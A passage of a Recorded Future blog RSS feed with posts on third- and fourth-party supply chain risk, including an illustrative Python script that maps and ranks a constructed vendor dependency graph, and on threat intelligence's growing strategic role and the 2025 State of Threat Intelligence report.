        <p><a href="https://www.gartner.com/en/documents/4013508">Gartner research</a> reveals that third-party breaches cost roughly 40% more to remediate than those that originate within an organization’s own systems, due to the additional complexity of managing incidents that span multiple entities, legal jurisdictions, and data environments. When breaches involve personally identifiable information (PII), PHI, or payment card data, costs can climb even higher as regulatory penalties and legal exposure multiply.</p>
        <h3>Hidden Dangers: Fourth-Party and Nth-Party Risk</h3>
        <p>Modern supply chains extend far beyond the vendors an organization directly manages. Each third-party relationship is underpinned by its own network of fourth and nth parties—subcontractors, technology providers, and cloud services. These indirect dependencies create exposure that most organizations can neither see nor control.</p>
        <p>According to Whistic’s <a href="https://6236605.fs1.hubspotusercontent-na1.net/hubfs/6236605/Marketing%20Collateral/2024-TPRM-Report.pdf">2024 Third-Party Risk Management Impact Report</a>, half of all companies work with more than 100 vendors, up from 38% in 2023. And for each third-party vendor in a supply chain, organizations typically have indirect relationships with nearly 14 times more fourth and fifth parties, according to <a href="https://2477095.fs1.hubspotusercontent-na1.net/hubfs/2477095/Nth%20Party%20Degree%20Report%20Dec%202023/RiskRecon_NthParty_Report_Dec%202023.pdf?__hstc=127855378.3ab44d155ecb3495e4def12973d6c601.1761591407434.1761591407434.1762273265238.2&amp;__hssc=127855378.2.1762273265238&amp;__hsfp=501937303&amp;hsCtaTracking=af9a93e2-8079-4f32-bf38-32016127808a%7Ca63b764c-431d-47bf-9481-524e3677291b">The Cyentia Institute</a>.</p>
        <p>These numbers underscore the growth of interconnected risk. Each new supplier introduces dozens of unseen connections, and every one of those connections can become an attacker’s entry point. The impact can quickly cascade through shared platforms, APIs, and service providers, affecting multiple tiers of partners and customers.</p>
        <p>The <a href="https://therecord.media/progress-software-elevates-severity-bug">MOVEit breach</a> of 2023 is a prime example. A single vulnerability in one managed file transfer product, Progress Software’s MOVEit Transfer, was exploited at scale, and the fallout spread to thousands of organizations, from banks and universities to government agencies. Many of those affected had no direct contract with Progress at all; they were exposed because a service provider somewhere in their supply chain ran the product.</p>
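        <p>The tiering and blast-radius reasoning above (and the “identify every third and fourth party, then prioritize by access and criticality” advice in the FAQ below) is easy to make concrete. The following is an added example, not Recorded Future’s code or product logic: it walks a constructed supplier graph, assigns each supplier a tier (third, fourth, nth party), reports the ratio of hidden to direct relationships, computes which direct vendors are exposed when a deep supplier such as a file transfer product is compromised, and ranks direct vendors by access, criticality and the number of suppliers beneath them. Every vendor name, access level and criticality rating in the block is an assumption made for illustration.</p>

```python
"""Map third-, fourth- and nth-party dependencies and rank the exposure they create.

Added example, not Recorded Future's code. The supplier graph and vendor
profiles below are constructed for illustration; the names, access levels
and criticality ratings are assumptions, not real suppliers.
"""
from collections import deque

# Constructed data: each supplier maps to the suppliers it depends on.
# Only the "ACME" edges are first-tier relationships the organisation holds
# contracts for; everything deeper is what a questionnaire never sees.
SUPPLY_GRAPH = {
    "ACME": ["PayrollCo", "CloudHost", "HelpdeskSaaS"],
    "PayrollCo": ["FileTransferVendor", "CloudHost"],
    "HelpdeskSaaS": ["CloudHost", "EmailRelay"],
    "CloudHost": ["DNSProvider"],
    "FileTransferVendor": [],
    "EmailRelay": ["DNSProvider"],
    "DNSProvider": [],
}

# Constructed metadata on the direct vendors, which is usually all a risk
# team has on file: access level (1 = public data .. 3 = regulated PII) and
# business criticality (1 = nice-to-have .. 3 = operations stop).
DIRECT_VENDOR_PROFILE = {
    "PayrollCo": {"access": 3, "criticality": 3},
    "CloudHost": {"access": 3, "criticality": 2},
    "HelpdeskSaaS": {"access": 2, "criticality": 1},
}


def map_tiers(graph, root):
    """Breadth-first walk from `root`; returns {supplier: tier}, where tier 1
    is a third party, 2 a fourth party, and so on. A supplier reached by
    several paths keeps its shortest (most direct) tier."""
    tiers = {}
    queue = deque([(root, 0)])
    while queue:
        node, depth = queue.popleft()
        for dep in graph.get(node, []):
            if dep != root and dep not in tiers:
                tiers[dep] = depth + 1
                queue.append((dep, depth + 1))
    return tiers


def indirect_multiplier(tiers):
    """Ratio of indirect (tier >= 2) to direct (tier 1) relationships, the
    kind of figure the nth-party reports cited above summarise."""
    direct = sum(1 for t in tiers.values() if t == 1)
    indirect = sum(1 for t in tiers.values() if t >= 2)
    return indirect / direct if direct else 0.0


def exposure_via(graph, root, compromised):
    """Direct vendors of `root` that depend on `compromised`, directly or
    through their own suppliers: the blast radius of a deep-tier breach."""
    def reaches(node, seen):
        if node == compromised:
            return True
        seen.add(node)  # shared visited set also guards against cycles
        return any(reaches(d, seen) for d in graph.get(node, []) if d not in seen)
    return sorted(v for v in graph.get(root, []) if reaches(v, set()))


def prioritise(profile, graph):
    """Rank direct vendors by access x criticality, breaking ties by how many
    hidden suppliers sit beneath each one."""
    rows = []
    for vendor, p in profile.items():
        beneath = len(map_tiers(graph, vendor))
        rows.append((p["access"] * p["criticality"], beneath, vendor))
    return [v for _, _, v in sorted(rows, reverse=True)]


if __name__ == "__main__":
    tiers = map_tiers(SUPPLY_GRAPH, "ACME")
    for vendor, tier in sorted(tiers.items(), key=lambda kv: (kv[1], kv[0])):
        print(f"tier {tier}: {vendor}")
    print(f"indirect-to-direct multiplier: {indirect_multiplier(tiers):.1f}x")
    print("exposed if FileTransferVendor is breached:",
          exposure_via(SUPPLY_GRAPH, "ACME", "FileTransferVendor"))
    print("review order:", prioritise(DIRECT_VENDOR_PROFILE, SUPPLY_GRAPH))
```

        <p>In the constructed graph the file transfer product is a fourth party that the organisation never contracted with, yet a breach of it lands on the payroll vendor that holds the most sensitive data; a shared DNS provider at the same tier would touch every direct vendor at once. That is the difference between asking a vendor what it runs and mapping what it actually depends on.</p>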
        <h2>Why Traditional Third-Party Risk Assessments Are Failing</h2>
        <p>For many organizations, third-party risk management still relies on the same tools and tactics used a decade ago—static checklists, self-reported questionnaires, and periodic audits. These methods were designed for a slower, more predictable vendor landscape. Today, they’re simply outmatched by the size and interconnectivity of modern supply chains.</p>
        <p>Vendor questionnaires and checklists are only as good as the answers provided. Too often, the information is outdated, incomplete, or inaccurate, leaving security teams with a false sense of assurance. These assessments might capture what a vendor’s security looked like at a single moment in time, but attackers don’t wait for your next scheduled check-in. Every day between audits is another opportunity for adversaries to exploit newly discovered vulnerabilities or misconfigurations.</p>
        <p>Static assessment programs also lack the scale and speed required to monitor hundreds or thousands of vendors effectively. As the vendor ecosystem expands, traditional approaches simply can’t keep pace with the dynamic nature of today’s threat environment.</p>
        <p>The data underscores just how strained these legacy methods have become:</p>
        <ul>
          <li><a href="https://www.riskrecon.com/state-of-third-party-risk-management-2024">44%</a> of organizations assess more than 100 third parties each year, yet only 4% of organizations have high confidence that their third-party questionnaires accurately reflect real-world risk.</li>
          <li>Nearly <a href="https://www.ey.com/content/dam/ey-unified-site/ey-com/en-gl/services/consulting/documents/ey-gl-2025-ey-global-third-party-risk-management-survey-05-2025.pdf">four in ten companies</a> use multiple questionnaires for different risk domains, sending an average of 55 questionnaires to third parties annually.</li>
        </ul>
        <p>These numbers reveal a troubling paradox: organizations are spending more time than ever assessing vendors but gaining less clarity than ever in return. Without continuous, intelligence-led visibility, even the most diligent third-party risk programs are operating one step behind and measuring compliance rather than managing risk.</p>
        <h2>Shifting from Assessment to Intelligence: A Better Approach</h2>
        <p>Traditional third-party risk assessments expose the limits of hindsight. <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-management">Intelligence-led monitoring</a> delivers the advantage of foresight.</p>
        <p>Static questionnaires stop at the vendor’s last self-reported status, which quickly becomes obsolete when adversaries move by the hour. An intelligence-based approach, by contrast, looks outward to live signals, behavioral patterns, and threat activity that reflect a vendor’s true security posture in real time.</p>
        <p>The core shift is from <strong>assessment</strong> to <strong>intelligence</strong>.</p>
        <ul>
          <li><strong>Assessments</strong> capture what vendors say about their defenses.</li>
          <li><strong>Intelligence</strong> reveals what attackers see (and often what vendors don’t yet know).</li>
        </ul>
        <p>This change is more than a process upgrade; it’s an evolution in how organizations manage supply chain security. Continuous, intelligence-led monitoring replaces static snapshots with ongoing, data-driven visibility across every tier of the vendor ecosystem.</p>
        <p>By ingesting indicators from the open web, dark web, and technical telemetry, organizations can identify vulnerabilities or emerging exploit chatter as they happen—not months after the fact. The advantages are clear:</p>
        <ul>
          <li><strong>Proactive vs. Reactive:</strong> Intelligence shifts third-party risk from response to prevention, allowing teams to identify issues before they evolve into breaches.</li>
          <li><strong>Objective vs. Subjective:</strong> Real-world data replaces self-attestation, grounding risk decisions in observable evidence rather than vendor claims.</li>
          <li><strong>Comprehensive Visibility:</strong> <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-monitoring">Continuous monitoring</a> provides an attacker’s-eye view of each vendor’s digital footprint, uncovering blind spots that traditional audits miss.</li>
        </ul>
        <h2>How Recorded Future’s Third-Party Intelligence Delivers Continuous, Contextual Insight</h2>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> exemplifies this modern approach. It delivers real-time risk scores and actionable alerts derived from the broadest range of data sources available, including dark web monitoring, technical telemetry, and validated threat intelligence. These insights integrate into existing risk management workflows, transforming static oversight into a living, adaptive defense.</p>
        <p><strong>Core capabilities include:</strong></p>
        <ul>
          <li><strong>Continuous Monitoring.</strong> Tracks over 5 million organizations and 1 million technology products for breaches, malicious traffic, ransomware extortion, and dark web chatter.</li>
          <li><strong>External Risk Scoring.</strong> Uses machine learning and NLP to analyze data from hundreds of thousands of open, dark web, and technical sources, generating dynamic Risk Scores that quantify vendor exposure.</li>
          <li><strong>Dark Web and Threat Intelligence.</strong> Identifies data leaks, compromised credentials, and chatter around vendor breaches before disclosure.</li>
          <li><strong>Comparative Vendor Assessment.</strong> Enables side-by-side comparison of vendors to prioritize procurement and onboarding decisions.</li>
          <li><strong>Stakeholder Reporting.</strong> Delivers comprehensive, context-rich risk profiles for leadership and board reporting.</li>
          <li><strong>API Integration.</strong> Connects with existing TPRM, GRC, and ticketing platforms, feeding risk data into established workflows.</li>
          <li><strong>Automated Mapping of Internal Entities and Subsidiaries.</strong> Assesses risk stemming from a supplier’s technical infrastructure, subsidiary relationships, and geographic footprint.</li>
          <li><strong>Custom Alerts.</strong> Allows teams to define criteria for alerts (e.g., vendor breach, new exposure) and focus only on the most relevant risks.</li>
        </ul>
        <p><strong>Customer outcomes include:</strong></p>
        <ul>
          <li>73% average increase in visibility into potential threats</li>
          <li>32% less time spent evaluating new vendors or suppliers</li>
          <li>35% more third parties assessed</li>
          <li>43% average increase in security team capacity</li>
        </ul>
        <div>
          <div>
            <div>
              <h2>Our time to detect third-party cyber breaches has decreased substantially. Previously, we were either notified directly by a third party or via a news outlet or regulatory reporting, which meant that it could take days or even weeks for us to be made aware. With Recorded Future, we've been able to identify third-party concerns within one to two days.</h2>
              <p>Senior Engineer</p>
              <p>Cybersecurity Incident Management, Insurance Company</p>
            </div>
          </div>
        </div>
        <p>The evidence is clear: reactive oversight leaves organizations blind to threats already moving through their supply chains. A continuous, intelligence-driven approach changes that equation. By combining real-time visibility with actionable insights, security and risk teams can detect vendor threats early, respond faster, and reduce the financial and reputational fallout of supply chain attacks.</p>
        <p>Don’t wait for the next third-party breach to become another statistic. <a href="https://www.recordedfuture.com/products/third-party-intelligence?utm_source=chatgpt.com">Book a demo</a> to see how Recorded Future’s Third-Party Intelligence helps organizations stay ahead of rapidly evolving risks.</p>
        <div>
          <div>
            <div>
              <h2>FAQs</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is considered a third-party risk?</h3>
              <p>A third-party risk is any potential threat to your organization's security, finances, or reputation posed by an external vendor, supplier, partner, or contractor who has access to your data, systems, or networks. This includes risks like data breaches, operational disruptions, and compliance violations originating from your supply chain.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What are the main types of third-party risk?</h3>
              <p>The main types include cybersecurity risk (data breaches, malware), operational risk (service disruptions), compliance risk (violating regulations like GDPR or CCPA), reputational risk (damage to your brand by association), and financial risk (revenue loss, regulatory fines).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How often should third-party risk assessments be conducted?</h3>
              <p>While traditional best practice was to conduct assessments annually, the current threat landscape demands a shift to continuous monitoring. Relying on annual, point-in-time assessments leaves significant security gaps where a vendor's risk posture can change without you knowing.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future help with third-party risk assessment?</h3>
              <p>Recorded Future’s Third-Party Intelligence solution transforms risk assessment from a static, manual process into a dynamic, data-driven one. It provides continuous, real-time intelligence on your vendors' external security posture by monitoring millions of sources, including the dark web. This allows you to proactively identify threats, prioritize risks with objective scoring, and take action before a vulnerability impacts your organization.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the first step to improving a third-party risk management program?</h3>
              <p>The first step is to gain complete visibility into your entire vendor ecosystem. You cannot protect what you don't know you have. This involves identifying every third party and fourth party with access to your data or systems and then beginning the process of prioritizing them based on their level of access and criticality to your operations.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1809f9481a6b24855bff52010115e19000c6f1e98.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat Intelligence & the C-Suite]]></title>
            <link>https://www.recordedfuture.com/blog/ti-from-soc-to-c-suite</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ti-from-soc-to-c-suite</guid>
            <pubDate>Wed, 12 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how threat intelligence has moved from the SOC to the boardroom. Learn why modern enterprises use it to drive strategic decisions, manage risk, and power governance across the business.]]></description>
            <content:encoded><![CDATA[
        <h2>From Defensive Maneuvering to Proactive Decision-Making</h2>
        <p>Threat intelligence is undergoing fundamental changes in both the breadth of its capabilities and its applications. We are seeing threat intelligence evolve from a tactical defensive tool—where teams are bringing in indicators of compromise and trying to make informed decisions around known risks—to a more proactive and strategic tool. Increasingly, enterprises are using threat intelligence to determine areas of investment, security tool purchasing, which supply chain or third party vendors to work with, and even how they train their employees.</p>
        <p>Rather than looking at threat intelligence as a kind of routine reporting reserved for security teams, organizations are beginning to see its value in broader business decision-making. Today, threat intelligence is being used across the enterprise, informing decisions from the board and executive levels all the way down to day-to-day security operations.</p>
        <p>With our 2025 State of Threat Intelligence report finding that 83% of organizations now run full-time threat intelligence teams, and most use intelligence to guide daily or weekly operations, it’s clear that what once began as a tactical advantage has now become a strategic necessity.</p>
        <h2>A Seat at the Boardroom Table: The Strategic Maturation of Threat Intelligence</h2>
        <p>These changes constitute a true paradigm shift in today’s enterprise security operations. In relatively short order, threat intelligence has evolved from just another security tool to an essential source of information for business strategy. So, what fueled this change?</p>
        <p>Threat intelligence was once the domain of analysts hunched over indicators and dashboards. But as cyber risk began shaping balance sheets and brand value, intelligence moved beyond the SOC. Today, it informs everything from vulnerability management and incident response to compliance, insurance, and executive protection. The same datasets that once helped detect intrusions now guide procurement choices, risk modeling, and crisis communication plans.</p>
        <p>As a result, we are seeing threat intelligence used by more than just security teams. It is now being used by governance, risk &amp; compliance (GRC) teams, fraud teams, physical security teams, marketing and communications teams, and perhaps most importantly, by executive leadership teams and board leadership.</p>
        <div>
          <div>
            <div>
              <h2>Modern threat intelligence shifts the narrative from “are we secure?” to “how much risk can we tolerate?” We're never going to reach zero risk. But with threat intelligence, we can ensure that we're operating at an acceptable level, where we can keep under control those things that would cause business disruption, competitive disadvantage, financial implications or regulatory failures.</h2>
            </div>
          </div>
        </div>
        <p>In our 2025 State of Threat Intelligence Report, Recorded Future found that nearly three-quarters (73%) of surveyed security professionals report using threat intelligence, as do 48% of incident response teams, 47% of risk management teams, and 46% of vulnerability management teams.</p>
        <p>This continued spread of threat intelligence across business functions signals a shift from threat intelligence as a tool for optimizing defensive posture to one for optimizing strategic integration and risk management.</p>
        <h2>The Board’s New Dashboard: Threat Intelligence as a Business Translator</h2>
        <p>As the board’s appetite for timely, relevant risk insight grows, threat intelligence provides a vital bridge between technical data and strategic clarity. Boards are increasingly demanding information and briefings that translate adversarial behavior into plain-language impacts, such as:</p>
        <ul>
          <li>Threat Intelligence-informed presentations shaping risk committee agendas</li>
          <li>Executive protection and brand monitoring as extensions of enterprise intelligence</li>
          <li>Threat Intelligence-driven prioritization of cybersecurity budgets and third-party vetting</li>
        </ul>
        <p>We can see these new applications play out in routine, yet vital, processes across the modern enterprise. Consider the following two scenarios and how they illustrate the ways in which threat intelligence is being used to determine executive and board-level decision-making:</p>
        <ul>
          <li><strong>High-risk, high-impact threats</strong> (like ransomware campaigns or geopolitical disruption) trigger strategic investment in contingency planning and data redundancy, and/or decisions around where to do business.</li>
          <li><strong>Persistent but lower-impact risks</strong> may inform tolerance thresholds or shape insurance coverage decisions.</li>
        </ul>
        <p>These examples demonstrate how intelligence enables boards to truly act on risk, not just acknowledge it. With these tools, organizations are now able to use threat intelligence to decide which businesses to work with, which technologies to bring on board, and whether or not the business can expand into new regions safely and effectively.</p>
        <div>
          <div>
            <div>
              <h2>Enterprises are increasing threat intelligence spend as security shifts from reactive defense to a holistic, intelligence-driven strategy. Modern intelligence helps detect attacks sooner, prioritize critical risks, and respond faster—strengthening vulnerability management, incident response, and board-level risk decisions. With ransomware, supply-chain attacks, and regulatory pressure on the rise, intelligence is now central to smarter, faster, and more effective enterprise-wide action.</h2>
              <p>2025 State of Threat Intelligence Report</p>
              <p>Recorded Future</p>
            </div>
          </div>
        </div>
        <h2>Intelligence as the Backbone of Enterprise Agility: How Threat Intelligence Keeps Orgs On Their Toes</h2>
        <p>Whereas in the past, an organization might use threat intelligence to inform their security posture, today, threat intelligence is being used in a much more holistic way, directly powering overall enterprise adaptability, resilience, and governance outcomes.</p>
        <p>In today’s rapidly changing threat landscape—with the growth of advanced, AI-enabled threats, supply-chain attacks, and shifting global regulations—boards can no longer afford to rely on static risk models. And it is comprehensive, timely, and relevant threat intelligence that helps keep today’s models dynamic.</p>
        <p>The majority of organizations today use threat intelligence to guide business decisions related to purchasing, risk assessment, and resource allocation. In our 2025 State of Threat Intelligence Report, Recorded Future found that:</p>
        <ul>
          <li>Nearly two-thirds (65%) of surveyed security professionals say threat intelligence directly supports security technology purchasing decisions</li>
          <li>58% say it guides risk assessment for business initiatives</li>
          <li>53% say it supports incident response resource allocation</li>
        </ul>
        <p>With all of these figures representing year-over-year increases, it’s safe to say that the majority of organizations have already adopted this more holistic view of threat intelligence. And for those that haven’t, all signs seem to suggest that they soon will. At the very least, we can say that they certainly ought to.</p>
        <h2>Intelligence-Driven Governance Is Essential for Modern Risk Management</h2>
        <p>The widespread adoption of threat intelligence across operations (including board-level decision-making) marks a turning point in how organizations perceive risk and value intelligence. No longer confined to security operations, threat intelligence is now a cornerstone of enterprise governance—a means of continuously informing executive and board-level risk decisions with clarity and confidence.</p>
        <p>In both its capabilities and its applications, threat intelligence has evolved dramatically over recent years, maturing from a reactive tool to a foundation for informed risk decision-making across the enterprise. From the SOC team, to the C-suite, and all the way to the board, threat intelligence is being used to inform a wide range of critical business decisions. With this larger shift in security from a reactive defense to a holistic, intelligence-driven strategy engine, enterprises are expanding their understanding and use of threat intelligence and seeing meaningful benefits as a result.</p>
        <p>Want to learn more about the state of enterprise threat intelligence today? <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">Download our 2025 State of Threat Intelligence Report here</a>.</p>
        <p>Interested in making modern threat intelligence a part of your board’s operations? <a href="https://www.recordedfuture.com/get-started#book-demo">Book a customized demo</a> with Recorded Future today.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1675c04e910df4130163445af824111e54bac26e2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Introducing the 2025 State of Threat Intelligence Report: Threat Intelligence Shifts from Defense to Strategy]]></title>
            <link>https://www.recordedfuture.com/blog/introducing-the-2025-state-of-threat-intelligence-report</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/introducing-the-2025-state-of-threat-intelligence-report</guid>
            <pubDate>Wed, 12 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how 43% of security leaders now use threat intelligence for strategic planning. Explore key insights from the 2025 State of Threat Intelligence Report, including enterprise spending trends, maturity challenges, and future investment plans.]]></description>
            <content:encoded><![CDATA[
        <h3>Nearly half of security leaders now use threat intelligence to guide business investments, as organizations mature their programs and 91% plan to increase spending in 2026.</h3>
        <h2>Key points</h2>
        <ol>
          <li>The third annual State of Threat Intelligence Report reveals that nearly half of security decision-makers use threat intelligence for strategic planning and investment, making it one of the most common use cases for enterprise organizations.</li>
          <li>With data breaches growing, most enterprises allocate substantial cybersecurity budgets to threat intelligence—and they plan to increase their spending in 2026.</li>
          <li>While threat intelligence maturity has improved year over year, more than half of respondents consider their organizations to be less than advanced—and almost half cite poor integration as a major challenge.</li>
          <li>More than half of security professionals expect moderate to significant changes to their threat intelligence needs in the next 12 months, and 81% said they plan to consolidate threat intelligence vendors.</li>
        </ol>
        <h2>Discover enterprises’ threat intelligence use cases, challenges, and future plans</h2>
        <p>Threat intelligence is no longer a nice-to-have—it's mission-critical. With state-sponsored attacks, cybercrime, and AI-powered threats on the rise, organizations are doubling down on threat intelligence as their secret weapon for proactive defense.</p>
        <p><a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">The 2025 State of Threat Intelligence</a> is Recorded Future’s third annual flagship research report designed to take the pulse of the cybersecurity industry. Incorporating data from 615 cybersecurity executives, managers, and practitioners, the report reveals enterprise organizations’ use cases, challenges, and future investment plans.</p>
        <p>By sharing what we’ve learned, we hope to help organizations make smarter decisions about their investments, vendor choices, and program maturity. And, it helps keep us grounded in the real challenges our customers face every day.</p>
        <p>Check out key themes and highlights, and then explore the report for full details.</p>
        <h2>Threat intelligence usage and adoption</h2>
        <p>The report reveals that, in 2025, enterprises increasingly trust and rely on threat intelligence to inform business-critical decisions. Not only do 43% use it to guide strategic investments and planning, but most also say it helps them make decisions related to purchasing, risk assessment, and resource allocation.</p>
        <p>Compared to 2024, a larger percentage of organizations now have full-time threat intelligence teams, and 89% pay at least one threat intelligence vendor. Find out about their top use cases, how frequently they use it, and the variety of teams across their organizations that actively consume the intelligence.</p>
        <h2>Threat intelligence spending and success metrics</h2>
        <p><a href="https://www.verizon.com/business/resources/reports/2025-dbir-data-breach-investigations-report.pdf">Data breaches involving a third party doubled from 2024 to 2025</a>, so it is no surprise that our survey found that most enterprise organizations allocate substantial cybersecurity budgets to threat intelligence. Seventy-six percent invest $250k or more per year in external threat intelligence products (excluding services), and 14% spend more than $1 million per year.</p>
        <p>When asked about how they measure the ROI of threat intelligence, most said their organizations focus on speed and efficiency gains. See how they rank success metrics, from improved threat detection and response times to reduction in the number of incidents to cost savings from prevented incidents.</p>
        <h2>Challenges with threat intelligence maturity</h2>
        <p>The survey found that threat intelligence maturity is improving year over year, with 49% of surveyed security professionals saying their maturity level is advanced. In other words, they have tools that combine outputs from multiple threat intelligence sources, a dedicated threat intelligence team, and <a href="https://www.recordedfuture.com/blog/why-manual-cyber-operations-can-create-dangerous-gaps">automated workflows</a> that integrate with most security activities including business risk assessment.</p>
        <p>As their organizations increase investment to grow their maturity, survey respondents told us they’re also experiencing challenges related to threat intelligence vendors. Almost half are frustrated by poor integration with their existing security tools, but issues ranging from vendor credibility to cost effectiveness also come into play. Explore the challenges your peers are facing on the journey to threat intelligence maturity.</p>
        <h2>Future plans to strengthen threat intelligence</h2>
        <p>Finally, we asked respondents to tell us how they plan to improve their threat intelligence maturity and outcomes. Ninety-one percent said they plan to invest more in threat intelligence in 2026, and more than half expect moderate to significant changes to their threat intelligence needs in the next 12 months.</p>
        <p>Given that 81% said they plan to consolidate threat intelligence vendors, they should prioritize vendors that support the most critical capabilities across a number of use cases. See the top five capabilities our respondents prioritize in their day-to-day work.</p>
        <h2>Find out where your organization stands in relation to your peers</h2>
        <p>The 2025 State of Threat Intelligence Report makes it clear: As threat intelligence delivers increasing strategic value, forward-thinking enterprises are boosting investment and evolving their use cases.</p>
        <p><a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">Download the report</a> to discover ideas and information that can help your organization succeed on its own maturity journey.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c9ad3d74e02dc4eb4b6e55581b20bdc7994c0ad9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
    </channel>
</rss>